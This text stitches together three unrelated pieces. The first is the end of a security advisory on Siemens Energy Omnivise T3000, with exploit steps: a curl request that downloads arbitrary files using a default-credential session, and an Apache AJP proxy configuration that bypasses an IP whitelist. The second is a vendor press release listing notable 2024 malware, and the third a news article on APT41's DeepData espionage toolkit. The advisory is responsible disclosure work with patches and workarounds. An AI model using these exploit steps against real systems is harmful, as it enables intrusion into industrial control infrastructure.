credentials with the following username andan easy to guess password:txpadmin:[redacted]Using these credentials an attacker gains an authenticated session. From there, one cansimply download arbitrary files:------------------------Curl -H "Cookie: JSESSIONID=31B4F2F1BAFC473AB41B65DDF2FD10BA;" -I -H "Content-Type:application/x-www-form-urlencoded" -X POST -d "filename=D:\sectest.txt&type=TEXT"http://$host:8080/RemoteDiagnosticView/DataServletHTTP/1.1 200Content-Type: text/plainTransfer-Encoding: chunked[...]Sectest---------------------------------4) IP Whitelist Bypass (CVE-2024-38879)The AJP protocol can be used to proxy requests from an Apache server to an applicationrunning on Tomcat. By setting up a local Apache server and configuring it to use theAJP service of the Application Server, the IP filter is circumvented.The following setup was built:------------------------------sudo apt-get install libapache2-mod-jksudo vim /etc/apache2/apache2.conf# append the following line to the config   Include ajp.confsudo vim /etc/apache2/ajp.conf# create the following file    ProxyRequests Off    <Proxy *>       Order deny,allow       Deny from all       Allow from localhost    </Proxy>    ProxyPass   / ajp://<Application Server IP>:8009/   ProxyPassReverse   / ajp://<Application Server IP>:8009/sudo a2enmod proxy_httpsudo a2enmod proxy_ajpsudo systemctl restart apache2--------------------------Afterwards, the e.g. RemoteDiagnosticView can be loaded from http://127.0.0.1/RemoteDiagnosticViewVulnerable / tested versions:-----------------------------The following version has been tested which was the latest version availableat the time of the test:* 8.2According to the vendor (T3000 SE Controls Security Announcement 2024/01 Update 1),the following versions and components are affected:All T3000 Versions >= Release 8.2 SP3:* Security Server* Thin Clients* Terminal Server* Application Server* Domain Controller* PDM VM* Whitelisting VM* NIDSVendor contact timeline:------------------------2024-06-05: Contacting vendor through productcert@siemens.com2024-06-06: Siemens assigned S-PCERT#408502024-06-12: Reaching out to specific contacts at Siemens Energy Cybersecurity.2024-06-13: They confirm that ProductCERT will get back to us once they have a timeline.2024-06-19: Customer informs us about a Siemens Energy Document that recommends to            change passwords after installation. The document is called "SE Controls            Security Announcement 2024/01" but only available to T3000 customers.2024-06-20: Sending feedback about the document to Siemens Energy Cybersecurity            as in our opinion it does not solve the issues.2024-06-20: They confirm again that ProductCERT is taking care of issues. Asks            to confirm that we received their messages, which we didn't -> Realized            that one of our email addresses was dropped during the communication,            recovered emails from second account.2024-06-17/2024-06-24: ProductCERT informs:            Vulnerability 1 cannot be reproduced in the reference installation.                 The product team is working to find potentially affected installation                 scenarios.            Vulnerability 2 was reproduced and the product team is working on a mitigation.                 Also, a related customer information has been distributed to customers.            Vulnerability 3 will be fixed in the next release of the T3000 distribution            Vulnerability 4 is already fixed in the current version. The product team is                 investigating, if this vulnerability is present in still supported versions.2024-06-21: ProductCERT informs us that they are able to reproduce all of the vulnerabilities            and provide fixes for most of them. Advisory draft should be shared with            SEC Consult next week. Ask to keep communication directed at ProductCERT            instead of Cybersecurity team.2024-06-28: ProductCERT sends over advisory draft. Could reproduce all vulnerabilities            and requested CVEs.2024-07-03: Siemens ProductCERT requests if we received the draft, as SEC Consult didn't answer yet.2024-07-03: SEC Consult confirms the reception of the advisory draft.2024-07-04: Submitted feedback for advisory draft to ProductCERT. From SEC Consult's            understanding, changing passwords after initial installation only fixes the            cleartext passwords in log files. The puppet issue would not be fixed.            Thus SEC Consult proposed to split Vulnerability 2 into two separate findings.2024-07-05: ProductCERT forwarded feedback to product team.2024-08-02: ProductCERT publishes SSA-857368.2024-08-05: Informing ProductCERT of vacation/absences, will coordinate further afterwards.2024-10-03: Proposing a meeting with ProductCERT to clarify and discuss all open issues.2024-10-22: Meeting with ProductCERT.2024-10-24: ProductCERT sends us further documents for T3000 regarding fixes/mitigations.2024-10-31: Sending advisory draft to ProductCERT, proposing advisory release date for 7th            November.2024-11-06: Receiving feedback from ProductCERT, postponing release to 12th November.2024-11-12: Coordinated release of advisory.Solution:---------Change the passwords to all components. Detailed instructions and patch informationcan be found when following Omnivise T3000 Technical News 2024-089 and SE ControlsSecurity Announcement 2024-01.Release 9.2 Fix / Mitigations:Issue 1 (CVE-2024-38876)* System Software Patch 22.173.20* System Software Patch 22.173.52* Application Software Patch 09.0.19.06Issue 2 (CVE-2024-38877)* System Software Patches 22.173.52* Application Software Patch 09.0.19.06* Technical News 2024-089Issue 3 (CVE-2024-38878)* Application Software Patch 09.0.19.06Issue 4 (CVE-2024-38879)* Application Software Patch 09.0.19.06Release 8.2 SP4 Fix / Mitigations:Patches are currently under development.Release 8.2 SP3 Fix / Mitigations:Currently no fixes are planned, but see Technical News 2024-089 for issue 2 (CVE-2024-38877)Workaround:-----------Limit access to the terminal servers.CVE-2024-38877: If the passwords are suspected to be compromised, change the passwordsfor all computers and service accounts. In addition follow the instructions fromOmnivise T3000 Technical News 2024-089, which is available through T3000 customerservice and applies to releases 8.2 SP3/SP4 and 9.2.Advisory URL:-------------https://sec-consult.com/vulnerability-lab/~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~SEC Consult Vulnerability LabAn integrated part of SEC Consult, an Eviden businessEurope | AsiaAbout SEC Consult Vulnerability LabThe SEC Consult Vulnerability Lab is an integrated part of SEC Consult, anEviden business. It ensures the continued knowledge gain of SEC Consult in thefield of network and application security to stay ahead of the attacker. TheSEC Consult Vulnerability Lab supports high-quality penetration testing andthe evaluation of new offensive and defensive technologies for our customers.Hence our customers obtain the most current information about vulnerabilitiesand valid recommendation about the risk profile of new technologies.~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~Interested to work with the experts of SEC Consult?Send us your application https://sec-consult.com/career/Interested in improving your cyber security with the experts of SEC Consult?Contact our local offices https://sec-consult.com/contact/~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~Mail: security-research at sec-consult dot comWeb: https://www.sec-consult.comBlog: https://blog.sec-consult.comTwitter: https://twitter.com/sec_consultEOF Steffen Robertz, Andreas Kolbeck/ @2024

Siemens Energy Omnivise T3000 8.2 SP3 Privilege Escalation / File Download

PRESS RELEASE

WATERLOO, ON, Oct. 31, 2024 /PRNewswire/ -- OpenText (NASDAQ: OTEX), (TSX: OTEX), has revealed its highly anticipated "Nastiest Malware of 2024" list, spotlighting the year's most notorious cyber threats. Now in its seventh year, OpenText's cybersecurity experts have identified the most relentless and adaptive malware trends impacting industries worldwide. This year, ransomware aimed at critical infrastructure takes center stage, highlighting an urgent call for reinforced security to protect vital services. In response, organizations are projected to increase their cybersecurity investments by 14.3% in 2024, reaching more than $215 billion.

Once again, ransomware group LockBit secures the #1 spot as the nastiest malware of the year. Known for its resilience and relentless pursuit of critical targets, LockBit has successfully dodged multiple law enforcement crackdowns. According to the FBI's 2023 2023 Internet Crime report, LockBit was reported in 175 attacks on critical infrastructure, underscoring its staying power and adaptability. The ongoing standoff between the FBI and LockBit shows the gritty persistence of today's ransomware market and its growing sophistication. For several months now, the battle for dominance between the FBI and LockBit has highlighted the persistence of the ransomware market and how as technology evolves these threats continually lurk in the shadows.    

"Ransomware attacks on critical infrastructure are on the rise, and cybercriminals are increasingly using artificial intelligence to develop highly personalized threats, which significantly endangers national security and public safety," said Muhi Majzoub, EVP and Chief Product Officer, OpenText. "However, the increased attention on ransomware and cybersecurity is encouraging, as more organizations are proactively prioritizing cybersecurity investments. This commitment highlights their dedication to safeguarding essential services from evolving threats." The 2024 list showcases how adaptive and innovative each ransomware is, but also how well these threats push boundaries. With their malicious capabilities and evasiveness, these cybercriminals continue to find new ways to surpass our darkest expectations.

2024's Nastiest Malware Hall of Infamy: 

1.  LockBit: This ransomware-as-a-service (RaaS) heavyweight leads the pack again, unfazed by FBI efforts to take it down. LockBit's aim? Target one million businesses before calling it quits, solidifying its spot as a top ransomware menace in 2024.
    
2.  Akira: A fresh and ferocious entry, Akira brings a splash of '80s aesthetics to the dark web, quickly climbing the ranks with ruthless encryption tactics and swift deployment. It's especially active in healthcare, manufacturing, and finance, cementing itself as a go-to Ransomware-as-a-Service (RaaS) model for affiliates.
    
3.  RansomHub: Rumored to be a descendant of the Black Cat (ALPHV) group, RansomHub burst onto the scene targeting high-profile organizations. After attacking Planned Parenthood, this group made headlines by stealing and ransoming sensitive patient data, threatening public exposure.
    
4.  Dark Angels: Known for its laser-focused, high-impact attacks on top-tier targets, Dark Angels doesn't hold back. Using advanced infiltration methods, they've secured ransom payments as high as $75 million, leaving their mark on one of the year's biggest Fortune 50 attacks.
    
5.  Redline: Not ransomware but still formidable, Redline Stealer specializes in stealing credentials and sensitive information with skillful evasion tactics, making it a persistent headache across various sectors.
    
6.  Play Ransomware: Making waves with high-profile attacks, Play Ransomware is as versatile as it is relentless. From targeting public and private sectors to exploiting FortiOS vulnerabilities and RDP servers, this group keeps victims on their toes with ever-evolving techniques.
    

Want the full rundown? Visit the OpenText Cybersecurity Community, view the infographic, and join us for our "Nastiest Malware Webinar" to dive deeper into this year's findings and stay ahead of emerging threats!

About OpenText Cybersecurity  
OpenText Cybersecurity provides comprehensive security solutions for companies and partners of all sizes. From prevention, detection and response to recovery, investigation and compliance, our unified/end-to-end platform helps customers build cyber resilience via a holistic security portfolio. Powered by actionable insights from our real-time and contextual threat intelligence, OpenText Cybersecurity customers benefit from high-efficacy products, compliant experience and simplified security to help manage business risk.

About OpenText   
OpenText™ is the leading Information Management software and services company in the world.  We help organizations solve complex global problems with a comprehensive suite of Business Clouds, Business AI, and Business Technology.  For more information about OpenText (NASDAQ/TSX: OTEX), please visit us at www.opentext.com.

Connect with us:

OpenText CEO Mark Barrenechea's blog  
Twitter | LinkedIn 

Certain statements in this press release may contain words considered forward-looking statements or information under applicable securities laws. These statements are based on OpenText's current expectations, estimates, forecasts and projections about the operating environment, economies, and markets in which the company operates. These statements are subject to important assumptions, risks and uncertainties that are difficult to predict, and the actual outcome may be materially different. OpenText's assumptions, although considered reasonable by the company at the date of this press release, may prove to be inaccurate and consequently its actual results could differ materially from the expectations set out herein. For additional information with respect to risks and other factors which could occur, see OpenText's Annual Report on Form 10-K, Quarterly Reports on Form 10-Q and other securities filings with the SEC and other securities regulators. Readers are cautioned not to place undue reliance upon any such forward-looking statements, which speak only as of the date made. Unless otherwise required by applicable securities laws, OpenText disclaims any intention or obligations to update or revise any forward-looking statements, whether as a result of new information, future events or otherwise. Further, readers should note that we may announce information using our website, press releases, securities law filings, public conference calls, webcasts and the social media channels identified on the Investors section of our website (https://investors.opentext.com). Such social media channels may include the Company's or our CEO's blog, Twitter account or LinkedIn account. The information posted through such channels may be material. Accordingly, readers should monitor such channels in addition to our other forms of communication.

OpenText Cybersecurity Unveils 2024's Nastiest Malware

The China-affiliated group is using the highly modular DeepData framework to target organizations in South Asia.

Source: u3d via Shutterstock

China's APT41 threat group is using a sophisticated Windows-based surveillance toolkit in a cyber-espionage campaign targeting organizations in South Asia.

The malware adds to the already broad portfolio of malicious tools that the threat actor has deployed in recent years and makes APT41 an even more pernicious threat to targeted enterprises.

**Optimized Plug-ins**

Researchers at BlackBerry, among the many who are tracking the threat actor, spotted the new malware toolkit earlier this year and have dubbed it "DeepData Framework." Their analysis showed it to be a highly modular toolkit that supports as many as 12 separate plug-ins, each one optimized for a specific malicious function.

Four of the plug-ins steal communications from WhatsApp, Signal, Telegram, and WeChat. Another three are rigged to steal and exfiltrate system information, Wi-Fi network data, and information on all installed applications on the compromised system — including names and installation paths. Three DeepData plug-ins steal information related to browsing history and cookies; they also grab passwords from Web browsers, Baidu storage services, FoxMail, and other cloud services, and other information like user emails and contact lists in Microsoft Outlook. The remaining two plug-ins enable theft of audio files from compromised systems.

Blackberry researchers chanced upon DeepData when conducting an investigation of "LightSpy," an iOS implant that they have tracked APT41 using in an ongoing and wide-ranging mobile espionage campaign against targets in India and South Asia. Their analysis showed DeepData to have a similar design to LightSpy in that both have a core module and support for multiple data theft plug-ins.

Significantly, DeepData appears to be a malware toolkit that the attackers are manually interacting with after compromising a target and gaining access. "The \[command and control\] address is also specified as a command line argument, as are the requested plugins to be run or data to extract," Blackberry's research and intelligence team said in a blog post this week. "The implication of this execution method is that it must be done manually, sans a script or some other bundling distribution."

**Surveillance Powers Continue to Grow**

DeepData adds to APT41's already formidable surveillance and cyber espionage capabilities. The malicious framework is an example of the constantly emerging threats that organizations have to deal with when trying to mitigate threats from advanced persistent threat groups and nation-state bad actors. "Our latest findings indicate that the threat actor behind DeepData has a clear focus on long-term intelligence gathering," BlackBerry said. Since first deploying LightSpy in 2022, the threat actor has methodically and strategically bulked up its capabilities to intercept communications and steal data in total stealth, BlackBerry said.

APT41 is a known threat actor that security vendors and researchers have been variously tracking as Winnti, WickedPanda, Barium, Wicked Spider, and other names. Some vendors consider APT41 to be a collection of smaller subgroups collectively working at the behest of, or on behalf of the Chinese government. The group's mandate appears to be very broad, based on its targets and the kind of campaigns it has conducted in recent years.

Most recently, researchers tied APT41 to attacks targeting global logistics and utilities companies, and to a campaign that targeted research entities in Taiwan. Over the years, the group has stolen data from a wide range of organizations, including intellectual property and trade secrets from healthcare organizations, media and entertainment companies, government agencies, automative firms, retailers, energy companies, pharmaceutical companies, and others. Its activities prompted a US government investigation and subsequent indictment of five alleged members of APT41 back in 2020. Its victims have spanned Europe, Asia, and North America.

The group's latest South Asian campaign appears aimed at politicians, journalists, and political activists in the region, according to BlackBerry. "Organizations of all sizes, particularly those in targeted regions, should treat this threat as a high priority and implement comprehensive defensive measures."

The company's recommended mitigation measures include blocking the group's known C2 infrastructure, monitoring networks and devices for unexpected audio recording activities, using secure communications for transmitting data, and deploying the detection rules that BlackBerry has released for DeepData components.  

Don't miss the upcoming free Dark Reading Virtual Event, "Know Your Enemy: Understanding Cybercriminals and Nation-State Threat Actors," Nov. 14 at 11 a.m. ET. Don't miss sessions on understanding MITRE ATT&CK, using proactive security as a weapon, and a masterclass in incident response; and a host of top speakers like Larry Larsen from the Navy Credit Federal Union, former Kaspersky Lab analyst Costin Raiu, Ben Read of Mandiant Intelligence, Rob Lee from SANS, and Elvia Finalle from Omdia. Register now!

**About the Author**

Jai Vijayan is a seasoned technology reporter with over 20 years of experience in IT trade journalism. He was most recently a Senior Editor at Computerworld, where he covered information security and data privacy issues for the publication. Over the course of his 20-year career at Computerworld, Jai also covered a variety of other technology topics, including big data, Hadoop, Internet of Things, e-voting, and data analytics. Prior to Computerworld, Jai covered technology issues for The Economic Times in Bangalore, India. Jai has a Master's degree in Statistics and lives in Naperville, Ill.

Tag

#ios